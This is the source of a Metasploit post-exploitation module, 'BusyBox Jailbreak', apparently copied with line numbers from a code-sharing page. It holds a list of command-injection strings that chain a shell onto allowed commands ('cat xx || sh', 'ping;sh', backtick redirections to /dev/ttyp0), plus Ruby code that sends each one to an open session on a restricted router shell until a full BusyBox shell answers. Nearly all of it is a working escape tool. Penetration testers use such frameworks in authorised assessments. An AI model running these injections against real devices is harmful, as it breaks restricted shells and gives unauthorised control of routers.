Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Post
7

8
  METHODS = [
9
    'cat xx || sh',
10
    'ping || sh',
11
    'echo `sh >> /dev/ttyp0`',
12
    'ping `sh >> /dev/ttyp0`',
13
    'cat `sh >> /dev/ttyp0`',
14
    'cat xx;sh',
15
    'echo xx;sh',
16
    'ping;sh',
17
    'cat xx | sh',
18
    'ping | sh',
19
    'cat ($sh)',
20
    'cat xx && sh',
21
    'echo xx && sh',
22
    'ping && sh'
23
  ]
24

25
  def initialize
26
    super(
27
      'Name' => 'BusyBox Jailbreak ',
28
      'Description' => %q{
29
        This module will send a set of commands to an open session that is connected to a
30
        BusyBox limited shell (i.e. a router limited shell). It will try different known
31
        tricks to jailbreak the limited shell and get a full BusyBox shell.
32
      },
33
      'Author' => 'Javier Vicente Vallejo',
34
      'License' => MSF_LICENSE,
35
      'Platform' => ['linux'],
36
      'SessionTypes' => ['shell']
37
    )
38
  end
39

40
  def run
41
    res = false
42

43
    METHODS.each do |m|
44
      res = try_method(m)
45
      break if res
46
    end
47

48
    print_error('Unable to jailbreak device shell') unless res
49
  end
50

51
  def try_method(command)
52
    vprint_status("jailbreak sent: #{command}")
53
    session.shell_write("#{command}\n")
54
    10.times do
55
      resp = session.shell_read
56
      next if resp.to_s.empty?
57

58
      vprint_status("jailbreak received: #{resp}")
59
      if resp.downcase =~ /busybox/i && resp.downcase =~ /built.*in shell/i
60
        print_good("Jailbreak accomplished with #{command}")
61
        return true
62
      end
63
    end
64

65
    false
66
  end
67
end
68

69